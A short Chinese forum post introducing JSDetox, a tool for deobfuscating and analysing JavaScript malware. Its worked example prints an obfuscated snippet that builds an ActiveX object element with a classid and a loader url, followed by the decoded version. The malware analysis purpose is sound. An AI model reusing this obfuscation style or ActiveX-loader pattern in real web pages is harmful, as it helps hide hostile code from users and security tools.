JSDetox - A javascript malware analysis tool

开源项目 guokai 发表于 6 年前最后回复来自 qq2850071112 4 年前

A javascript malware analysis tool using static analysis / deobfuscation techniques and an execution engine featuring HTML DOM emulation

For example, Original Code:

var GPSweCkB = document.createElement((function () { var XoNO="ject",apoc="ob"; return apoc+XoNO })());
GPSweCkB.setAttribute((function () { var pYmx="ssid",aTIE="a",tvPA="cl"; return tvPA+aTIE+pYmx })(), (function () { var MbWt="7566",UcNA="7",PUHo="c",yFIi="6-2F5",YXvW="sid",sYCs="E-4BAF",SZBF="9",yZMK="-AC28-CF26AA",BmVk="l",AbBB="58",iRQW="636",RQLv=":55"; return PUHo+BmVk+YXvW+RQLv+SZBF+iRQW+UcNA+yFIi+sYCs+yZMK+AbBB+MbWt })());
GPSweCkB.url = String.fromCharCode(104,0164,0164,112,0x3a,0x2f,0x2f,49,50,067,056,48,0x2e,48,46,49,072,0x38,060,070,060,47,47,112,0165,0x46,0x62,0x4a,111,0146,0124,0143,0172,0x43,89,82,0x75,65,111,81,47);

Analysis Result:

var GPSweCkB = document.createElement("object");
GPSweCkB.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
GPSweCkB.url = "http://127.0.0.1:8080//puFbJofTczCYRuAoQ/";

原本打算装一个分析下最近几天截获某网络运营商注入到页面的广告代码,结果依赖的the ruby racer 0.9.8在我的Mac Lion下没安装成功。

项目地址:JSDetox

暂无回复,说出你的观点吧
登录后即可参与回复